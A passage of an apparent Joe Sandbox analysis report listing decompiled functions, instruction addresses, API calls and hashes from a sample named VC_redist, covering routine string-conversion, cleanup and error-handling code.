                                                                          0x00058c44
                                                                          0x00058c48
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058c48
                                                                          0x00058c23
                                                                          0x00058c28
                                                                          0x00058c2c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058bf4
                                                                          0x00058c01
                                                                          0x00058c06
                                                                          0x00058c0a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058c0a
                                                                          0x00058bba
                                                                          0x00058bc7
                                                                          0x00058bcc
                                                                          0x00058bd0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058bd0
                                                                          0x00058b6e
                                                                          0x00058b6e
                                                                          0x00058b7f
                                                                          0x00058b89
                                                                          0x00058b94
                                                                          0x00058c62
                                                                          0x00058c67
                                                                          0x00058c68
                                                                          0x00058c6b
                                                                          0x00058c74
                                                                          0x00058c74

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: <$@Met$uriutil.cpp
                                                                          • API String ID: 1452528299-1405237575
                                                                          • Opcode ID: a6348f9a61e91fe5f6a370b2968c09c3fbd3ebd952e92b7611f8f21b71e1410d
                                                                          • Instruction ID: d1e6a3e35db9a9a3fee42af542cbe8eb411c71204e1693ce1c10545e09b47b99
                                                                          • Opcode Fuzzy Hash: a6348f9a61e91fe5f6a370b2968c09c3fbd3ebd952e92b7611f8f21b71e1410d
                                                                          • Instruction Fuzzy Hash: EE51ED71D012289BDB21DF65CC88ADAB7F8AF48701F4081E6AD49B7211DB319E988F61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000490AA Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E000490AA(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t54;
				int _t56;
				signed int _t62;
				int _t65;
				short* _t66;
				signed int _t67;
				short* _t68;

				_t64 = __edx;
				_t34 =  *0x7a008; // 0xfbf51acb
				_v8 = _t34 ^ _t67;
				E000419B7(_t54,  &_v28, __edx, _a4);
				_t56 = _a24;
				if(_t56 == 0) {
					_t6 = _v24 + 8; // 0xe3e85006
					_t53 =  *_t6;
					_t56 = _t53;
					_a24 = _t53;
				}
				_t65 = 0;
				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0003DE36(_t54, _v8 ^ _t67, _t64, _t65, _t66);
				}
				_t54 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t54 + 0x00000008 & _t40) == 0) {
					_t66 = 0;
					L11:
					if(_t66 != 0) {
						E0003F670(_t65, _t66, _t65, _t54);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
						if(_t46 != 0) {
							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
						}
					}
					L14:
					E000491C7(_t66);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t54 + 0x00000008;
				_t62 = _t54 + 8;
				if((_t40 & _t54 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t66 = E00045154(_t62, _t48 & _t62);
					if(_t66 == 0) {
						goto L14;
					}
					 *_t66 = 0xdddd;
					L9:
					_t66 =  &(_t66[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00059DF0();
				_t66 = _t68;
				if(_t66 == 0) {
					goto L14;
				}
				 *_t66 = 0xcccc;
				goto L9;
			}
























                                                                          0x000490aa
                                                                          0x000490b2
                                                                          0x000490b9
                                                                          0x000490c5
                                                                          0x000490ca
                                                                          0x000490cf
                                                                          0x000490d4
                                                                          0x000490d4
                                                                          0x000490d7
                                                                          0x000490d9
                                                                          0x000490d9
                                                                          0x000490de
                                                                          0x000490f7
                                                                          0x000490fd
                                                                          0x00049102
                                                                          0x000491a1
                                                                          0x000491a5
                                                                          0x000491aa
                                                                          0x000491aa
                                                                          0x000491c6
                                                                          0x000491c6
                                                                          0x00049108
                                                                          0x00049110
                                                                          0x00049114
                                                                          0x00049160
                                                                          0x00049162
                                                                          0x00049164
                                                                          0x00049169
                                                                          0x00049180
                                                                          0x00049188
                                                                          0x00049198
                                                                          0x00049198
                                                                          0x00049188
                                                                          0x0004919a
                                                                          0x0004919b
                                                                          0x00000000
                                                                          0x000491a0
                                                                          0x0004911b
                                                                          0x0004911d
                                                                          0x0004911f
                                                                          0x00049127
                                                                          0x00049144
                                                                          0x0004914e
                                                                          0x00049153
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00049155
                                                                          0x0004915b
                                                                          0x0004915b
                                                                          0x00000000
                                                                          0x0004915b
                                                                          0x0004912b
                                                                          0x0004912f
                                                                          0x00049134
                                                                          0x00049138
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004913a
                                                                          0x00000000

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,E3E85006,0004234D,00000000,00000000,00043382,?,00043382,?,00000001,0004234D,E3E85006,00000001,00043382,00043382), ref: 000490F7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00049180
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00049192
                                                                          • __freea.LIBCMT ref: 0004919B
                                                                            • Part of subcall function 00045154: HeapAlloc.KERNEL32(00000000,?,?,?,00041E90,?,0000015D,?,?,?,?,000432E9,000000FF,00000000,?,?), ref: 00045186
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                          • String ID:
                                                                          • API String ID: 573072132-0
                                                                          • Opcode ID: 4f7af860d1da2258388fc981dd794852a686bd1e4f5de28d382dee39352af18f
                                                                          • Instruction ID: 3b6770700de53ae7bead225b6246da2e5697d0bd6072cbb43d23903dc15464af
                                                                          • Opcode Fuzzy Hash: 4f7af860d1da2258388fc981dd794852a686bd1e4f5de28d382dee39352af18f
                                                                          • Instruction Fuzzy Hash: C831CDB2A0021AABDF259F64DC49DEF7BA9EB41310F044139FC04D62A1E735DD54CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00014E9C Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00014E9C(void* __ebx, void* __ecx, void* __edi, struct _CRITICAL_SECTION* _a4) {
				void* __esi;
				void* _t38;
				long _t66;
				void* _t79;
				void* _t80;
				void* _t81;
				struct _CRITICAL_SECTION* _t82;

				_t81 = __edi;
				_t80 = __ecx;
				_t79 = __ebx;
				_t82 = _a4;
				_t31 =  *((intOrPtr*)(_t82 + 0x4e0));
				if( *((intOrPtr*)(_t82 + 0x4e0)) != 0) {
					E00011160(_t31);
				}
				_t32 =  *((intOrPtr*)(_t82 + 0x4d8));
				if( *((intOrPtr*)(_t82 + 0x4d8)) != 0) {
					E000554EF(_t32);
				}
				E00024B2B(_t82 + 0x4b8);
				E00024B2B(_t82 + 0x4a0);
				_t37 =  *((intOrPtr*)(_t82 + 0x49c));
				if( *((intOrPtr*)(_t82 + 0x49c)) != 0) {
					E000554EF(_t37);
				}
				_t38 =  *(_t82 + 0x3e4);
				if(_t38 != 0) {
					CloseHandle(_t38);
					 *(_t82 + 0x3e4) =  *(_t82 + 0x3e4) & 0x00000000;
				}
				DeleteCriticalSection(_t82 + 0xd0);
				E0001D79F(_t81, _t82 + 0xb8);
				E0001BEFA(_t79, _t82 + 0x3d8);
				E0001E79A(_t79, _t80, _t81, _t82 + 0x2f0);
				E0001872B(_t79, _t82 + 0x88);
				E0001B037(_t82, _t82 + 0xb0);
				E00020704(_t80, _t82 + 0x100);
				E0001D133(_t82, _t82 + 0x2b8);
				E0001E647(_t80, _t82 + 0x2c0);
				E0001C8F1(_t81, _t82 + 0x2b0);
				E0001BB09(_t81, _t82 + 0x48);
				E0001C6C4(_t81, _t82 + 0x2a8);
				if( *((intOrPtr*)(_t82 + 0x40)) != 0) {
					E000554EF( *((intOrPtr*)(_t82 + 0x40)));
				}
				if( *((intOrPtr*)(_t82 + 0x28)) != 0) {
					E000554EF( *((intOrPtr*)(_t82 + 0x28)));
				}
				_t62 =  *((intOrPtr*)(_t82 + 0x408));
				if( *((intOrPtr*)(_t82 + 0x408)) != 0) {
					E000554EF(_t62);
				}
				_t63 =  *((intOrPtr*)(_t82 + 0x404));
				if( *((intOrPtr*)(_t82 + 0x404)) != 0) {
					E000554EF(_t63);
				}
				_t64 =  *((intOrPtr*)(_t82 + 0x400));
				if( *((intOrPtr*)(_t82 + 0x400)) != 0) {
					E000554EF(_t64);
				}
				_t65 =  *((intOrPtr*)(_t82 + 0x3f8));
				if( *((intOrPtr*)(_t82 + 0x3f8)) != 0) {
					E000554EF(_t65);
				}
				_t66 =  *(_t82 + 0x498);
				if(_t66 != 0xffffffff) {
					TlsFree(_t66);
				}
				DeleteCriticalSection(_t82);
				return E0003F670(_t81, _t82, 0, 0x4e8);
			}










                                                                          0x00014e9c
                                                                          0x00014e9c
                                                                          0x00014e9c
                                                                          0x00014ea0
                                                                          0x00014ea3
                                                                          0x00014eab
                                                                          0x00014eae
                                                                          0x00014eae
                                                                          0x00014eb3
                                                                          0x00014ebb
                                                                          0x00014ebe
                                                                          0x00014ebe
                                                                          0x00014eca
                                                                          0x00014ed6
                                                                          0x00014edb
                                                                          0x00014ee3
                                                                          0x00014ee6
                                                                          0x00014ee6
                                                                          0x00014eeb
                                                                          0x00014ef3
                                                                          0x00014ef6
                                                                          0x00014efc
                                                                          0x00014efc
                                                                          0x00014f0a
                                                                          0x00014f17
                                                                          0x00014f23
                                                                          0x00014f2f
                                                                          0x00014f3b
                                                                          0x00014f47
                                                                          0x00014f53
                                                                          0x00014f5f
                                                                          0x00014f6b
                                                                          0x00014f77
                                                                          0x00014f80
                                                                          0x00014f8c
                                                                          0x00014f95
                                                                          0x00014f9a
                                                                          0x00014f9a
                                                                          0x00014fa3
                                                                          0x00014fa8
                                                                          0x00014fa8
                                                                          0x00014fad
                                                                          0x00014fb5
                                                                          0x00014fb8
                                                                          0x00014fb8
                                                                          0x00014fbd
                                                                          0x00014fc5
                                                                          0x00014fc8
                                                                          0x00014fc8
                                                                          0x00014fcd
                                                                          0x00014fd5
                                                                          0x00014fd8
                                                                          0x00014fd8
                                                                          0x00014fdd
                                                                          0x00014fe5
                                                                          0x00014fe8
                                                                          0x00014fe8
                                                                          0x00014fed
                                                                          0x00014ff6
                                                                          0x00014ff9
                                                                          0x00014ff9
                                                                          0x00015000
                                                                          0x00015018

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,0001545F,?,?,?,?,?,?), ref: 00014EF6
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,0001545F,?,?,?,?,?,?), ref: 00014F0A
                                                                          • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0001545F,?,?), ref: 00014FF9
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0001545F,?,?), ref: 00015000
                                                                            • Part of subcall function 00011160: LocalFree.KERNEL32(?,?,00014EB3,?,00000000,?,0001545F,?,?,?,?,?,?), ref: 0001116A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                          • String ID:
                                                                          • API String ID: 3671900028-0
                                                                          • Opcode ID: b40b79ef3eeca2e6523c9255e7f813807c6abf84315d2c02db63dc3aa87ad227
                                                                          • Instruction ID: 945af1d1f8289d793d9dd59bc597d1461c377f0be4d6adc6f68ce33ed1e9f597
                                                                          • Opcode Fuzzy Hash: b40b79ef3eeca2e6523c9255e7f813807c6abf84315d2c02db63dc3aa87ad227
                                                                          • Instruction Fuzzy Hash: 2F4196B1500B05ABDA60EBB4C89AFDB73ECAF04346F44082DB65AD3192DB34F5858B25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00055F0F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E00055F0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28) {
				char _v8;
				intOrPtr* _t19;
				intOrPtr* _t21;
				void* _t39;
				char _t41;
				void* _t43;

				_t39 =  !=  ? 0x84400200 : 0x84c00200;
				_v8 = 0;
				_t43 = E000121A5( &_v8, _a16, 0);
				if(_t43 < 0) {
					L13:
					if(_v8 != 0) {
						E000554EF(_v8);
					}
					return _t43;
				}
				_t19 = _a20;
				if(_t19 == 0 ||  *_t19 == 0) {
					L4:
					_t41 =  *0x7a978(_a4, _a8, _v8, 0, 0, 0x7a7c4, _t39, 0);
					if(_t41 != 0) {
						_t21 = _a24;
						if(_t21 == 0 ||  *_t21 == 0) {
							L10:
							 *_a28 = _t41;
							_t41 = 0;
							goto L11;
						} else {
							_push(0x40000000);
							_push(0xffffffff);
							_push(_t21);
							_push(_t41);
							if( *0x7a980() != 0) {
								goto L10;
							}
							_t47 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
							_t43 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "dlutil.cpp", 0x244, _t43);
							L11:
							if(_t41 != 0) {
								 *0x7a96c(_t41);
							}
							goto L13;
						}
					}
					_t50 =  <=  ? GetLastError() : _t28 & 0x0000ffff | 0x80070000;
					_t43 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t28 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "dlutil.cpp", 0x23e, _t43);
					goto L13;
				} else {
					_t43 = E00011EF2( &_v8, _t19, 0);
					if(_t43 < 0) {
						goto L13;
					}
					goto L4;
				}
			}









                                                                          0x00055f2a
                                                                          0x00055f2d
                                                                          0x00055f39
                                                                          0x00055f3d
                                                                          0x00056013
                                                                          0x00056016
                                                                          0x0005601b
                                                                          0x0005601b
                                                                          0x00056028
                                                                          0x00056028
                                                                          0x00055f43
                                                                          0x00055f48
                                                                          0x00055f64
                                                                          0x00055f7c
                                                                          0x00055f80
                                                                          0x00055fb2
                                                                          0x00055fb7
                                                                          0x00056001
                                                                          0x00056004
                                                                          0x00056006
                                                                          0x00000000
                                                                          0x00055fbe
                                                                          0x00055fbe
                                                                          0x00055fc3
                                                                          0x00055fc5
                                                                          0x00055fc6
                                                                          0x00055fcf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055fe2
                                                                          0x00055fec
                                                                          0x00055ffa
                                                                          0x00056008
                                                                          0x0005600a
                                                                          0x0005600d
                                                                          0x0005600d
                                                                          0x00000000
                                                                          0x0005600a
                                                                          0x00055fb7
                                                                          0x00055f93
                                                                          0x00055f9d
                                                                          0x00055fab
                                                                          0x00000000
                                                                          0x00055f4f
                                                                          0x00055f5a
                                                                          0x00055f5e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055f5e

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$dlutil.cpp
                                                                          • API String ID: 1452528299-1896680629
                                                                          • Opcode ID: 2df2e5be8e5d57befc7a7c89efe0e10b3b1c22493101a01ff3a3bb6f09dd18f9
                                                                          • Instruction ID: 2d97900444b494ad341fbf2e1295c50342b0271e1ebcbe36f146f55ac63b476a
                                                                          • Opcode Fuzzy Hash: 2df2e5be8e5d57befc7a7c89efe0e10b3b1c22493101a01ff3a3bb6f09dd18f9
                                                                          • Instruction Fuzzy Hash: B5310572E00315BBEB219EA98C44BAB76ECEF41762B124129FD05E7190DB36CD50D7B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00055587 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 50%
                                                                          			E00055587(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;

				_t34 = 0;
				_push( &_v8);
				_push(0);
				_push(_a8);
				_v8 = 0;
				_push(_a4);
				if( *0x7a938() != 0) {
					_t31 = E000138D4(_v8, 1);
					if(_t31 != 0) {
						_push( &_v8);
						_push(_t31);
						_push(_a8);
						_push(_a4);
						if( *0x7a938() != 0) {
							_t29 = _a16;
							 *_a12 = _t31;
							_t31 = 0;
							if(_t29 == 0) {
								L10:
								L11:
								return _t34;
							}
							 *_t29 = _v8;
							L8:
							if(_t31 != 0) {
								E00013999(_t31);
							}
							goto L10;
						}
						_t38 =  <=  ? GetLastError() : _t21 & 0x0000ffff | 0x80070000;
						_t34 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t21 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "certutil.cpp", 0x1f, _t34);
						goto L8;
					}
					_t34 = 0x8007000e;
					E000137D3(_t14, "certutil.cpp", 0x1b, 0x8007000e);
					goto L10;
				}
				_t41 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
				_t34 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
				E000137D3(0x80004005, "certutil.cpp", 0x17, _t34);
				goto L11;
			}







                                                                          0x0005558f
                                                                          0x00055591
                                                                          0x00055592
                                                                          0x00055593
                                                                          0x00055596
                                                                          0x00055599
                                                                          0x000555a4
                                                                          0x000555e1
                                                                          0x000555e5
                                                                          0x000555fe
                                                                          0x000555ff
                                                                          0x00055600
                                                                          0x00055603
                                                                          0x0005560e
                                                                          0x00055640
                                                                          0x00055643
                                                                          0x00055645
                                                                          0x00055649
                                                                          0x0005565a
                                                                          0x0005565b
                                                                          0x00055661
                                                                          0x00055661
                                                                          0x0005564e
                                                                          0x00055650
                                                                          0x00055652
                                                                          0x00055655
                                                                          0x00055655
                                                                          0x00000000
                                                                          0x00055652
                                                                          0x00055621
                                                                          0x0005562b
                                                                          0x00055636
                                                                          0x00000000
                                                                          0x00055636
                                                                          0x000555e7
                                                                          0x000555f4
                                                                          0x00000000
                                                                          0x000555f4
                                                                          0x000555b7
                                                                          0x000555c1
                                                                          0x000555cc
                                                                          0x00000000

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00029133,?,00000003,00000000,?), ref: 000555A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$certutil.cpp
                                                                          • API String ID: 1452528299-2574553069
                                                                          • Opcode ID: d9e3382e49a30f2fb02e4a61d9a2091077b1bde6fb137736463cc8065fcbc64b
                                                                          • Instruction ID: ab19432d6634398d3f0a18d66bb196e5802e439f42c6301176f1acf782cda3dc
                                                                          • Opcode Fuzzy Hash: d9e3382e49a30f2fb02e4a61d9a2091077b1bde6fb137736463cc8065fcbc64b
                                                                          • Instruction Fuzzy Hash: 44210476A40625FBEB209BA58D14FEB7BE8DF44752F014015FD09EB150EB35CD0496E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005898E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 38%
                                                                          			E0005898E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				unsigned int _v8;
				char _v12;
				long _t22;
				intOrPtr* _t34;
				void* _t37;

				_t34 = _a12;
				_v8 = 0;
				_v12 = 0;
				if( *_t34 != 0) {
					L2:
					_t37 = E000127EA( *_t34,  &_v8);
					if(_t37 < 0) {
						L11:
						return _t37;
					}
					_push( &_v12);
					_push( &_v8);
					_push( *_t34);
					_push(_a8);
					_push(_a4);
					if( *0x7a988() != 0) {
						goto L11;
					}
					_t22 = GetLastError();
					if(_t22 != 0x7a) {
						L9:
						_t37 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
						if(_t37 < 0) {
							E000137D3(_t22, "inetutil.cpp", 0x6c, _t37);
						}
						goto L11;
					}
					_t25 = _v8 + 2;
					_v8 = _v8 + 2;
					_t37 = E00011EDE(_t34, _t25 >> 1);
					if(_t37 < 0) {
						goto L11;
					} else {
						_push( &_v12);
						_push( &_v8);
						_push( *_t34);
						_push(_a8);
						_push(_a4);
						if( *0x7a988() != 0) {
							_t22 = 0;
						} else {
							_t22 = GetLastError();
						}
						goto L9;
					}
				}
				_t37 = E00011EDE(_t34, 0x40);
				if(_t37 < 0) {
					goto L11;
				}
				goto L2;
			}








                                                                          0x00058995
                                                                          0x0005899a
                                                                          0x0005899d
                                                                          0x000589a2
                                                                          0x000589b6
                                                                          0x000589c1
                                                                          0x000589c5
                                                                          0x00058a4b
                                                                          0x00058a52
                                                                          0x00058a52
                                                                          0x000589ce
                                                                          0x000589d2
                                                                          0x000589d3
                                                                          0x000589d5
                                                                          0x000589d8
                                                                          0x000589e3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000589e5
                                                                          0x000589ee
                                                                          0x00058a2c
                                                                          0x00058a37
                                                                          0x00058a3c
                                                                          0x00058a46
                                                                          0x00058a46
                                                                          0x00000000
                                                                          0x00058a3c
                                                                          0x000589f3
                                                                          0x000589f6
                                                                          0x00058a02
                                                                          0x00058a06
                                                                          0x00000000
                                                                          0x00058a08
                                                                          0x00058a0b
                                                                          0x00058a0f
                                                                          0x00058a10
                                                                          0x00058a12
                                                                          0x00058a15
                                                                          0x00058a20
                                                                          0x00058a2a
                                                                          0x00058a22
                                                                          0x00058a22
                                                                          0x00058a22
                                                                          0x00000000
                                                                          0x00058a20
                                                                          0x00058a06
                                                                          0x000589ac
                                                                          0x000589b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,000560E7,?,00000033,?,?,00000013,00000000), ref: 000589E5
                                                                          • GetLastError.KERNEL32(?,000560E7,?,00000033,?,?,00000013,00000000), ref: 00058A22
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$inetutil.cpp
                                                                          • API String ID: 1452528299-2500885081
                                                                          • Opcode ID: 1b1ae4d2db1d092b736196a6bb7d432217d549948a2c661eaee9309c3289f2e9
                                                                          • Instruction ID: d47e666be2942eb17124a381335eba8faec52b89595cea15f01c252c2fb802df
                                                                          • Opcode Fuzzy Hash: 1b1ae4d2db1d092b736196a6bb7d432217d549948a2c661eaee9309c3289f2e9
                                                                          • Instruction Fuzzy Hash: 96219232900129BBEF219BA4CC44AEFBBA8EF04751B118122FD05F6110EB35DE549BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053119 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 44%
                                                                          			E00053119(void* __eax, intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v20;
				char _v28;
				intOrPtr* _t36;
				intOrPtr* _t39;
				signed int _t40;
				signed int _t41;
				signed int* _t43;
				void* _t46;
				void* _t47;
				void* _t51;

				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				__imp__#2(_a8);
				_t46 = __eax;
				__imp__#8( &_v28);
				_t39 = _a4;
				_t47 =  *((intOrPtr*)( *_t39 + 0x44))(_t39,  &_v8);
				if(_t47 >= 0) {
					_t47 = E0005336E( &_v12, _v8, __eax,  &_v12);
					if(_t47 != 1 && _t47 >= 0) {
						_t36 = _v12;
						_t47 =  *((intOrPtr*)( *_t36 + 0x20))(_t36,  &_v28);
						_t51 = _t47;
						if(_t51 >= 0 && _t51 == 0) {
							_t43 = _a12;
							if(_t43 != 0) {
								_v20 = _v20 & 0x00000000;
								 *_t43 = _v20;
							}
						}
					}
				}
				_t40 = _v8;
				if(_t40 != 0) {
					 *((intOrPtr*)( *_t40 + 8))(_t40);
				}
				_t41 = _v12;
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41 + 8))(_t41);
				}
				__imp__#9( &_v28);
				if(_t46 != 0) {
					__imp__#6(_t46);
				}
				return _t47;
			}















                                                                          0x0005311f
                                                                          0x00053123
                                                                          0x0005312c
                                                                          0x00053132
                                                                          0x00053138
                                                                          0x0005313e
                                                                          0x0005314b
                                                                          0x0005314f
                                                                          0x0005315e
                                                                          0x00053163
                                                                          0x00053169
                                                                          0x00053176
                                                                          0x00053178
                                                                          0x0005317a
                                                                          0x0005317e
                                                                          0x00053183
                                                                          0x00053188
                                                                          0x0005318c
                                                                          0x0005318c
                                                                          0x00053183
                                                                          0x0005317a
                                                                          0x00053163
                                                                          0x0005318e
                                                                          0x00053193
                                                                          0x00053198
                                                                          0x00053198
                                                                          0x0005319b
                                                                          0x000531a0
                                                                          0x000531a5
